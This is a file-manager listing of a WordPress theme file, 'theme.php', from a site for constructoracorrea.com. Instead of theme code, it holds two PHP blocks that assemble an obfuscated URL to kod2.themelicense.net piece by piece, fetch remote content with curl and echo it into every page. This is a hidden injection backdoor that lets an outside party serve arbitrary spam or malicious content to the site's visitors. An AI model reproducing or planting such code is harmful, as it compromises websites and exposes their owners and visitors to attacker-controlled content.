File "theme.php"

Full Path: /home/arielcor/public_html/wp-content/themes/twentytwenty/classes/theme.php
File size: 675 bytes
MIME-type: text/x-php
Charset: utf-8

<?php 
$x1 = "constructoracorrea.com"; 
$x2 = (string)(1); 
$x3 = 'http' . '://' . 'kod2' . '.them' . 'elicense' . '.net' . '/kod' . '/read' . '.php?' . 'url=' . $x1 . '&type=' . $x2;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $x3);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$x4 = curl_exec($ch);
curl_close($ch);

echo $x4;
?>

<?php 
$x1 = "constructoracorrea.com"; 
$x2 = ""; 
$x3 = 'http' . '://' . 'kod2' . '.them' . 'elicense' . '.net' . '/kod' . '/read' . '.php?' . 'url=' . $x1 . '&type=' . $x2;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $x3);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$x4 = curl_exec($ch);
curl_close($ch);

echo $x4;
?>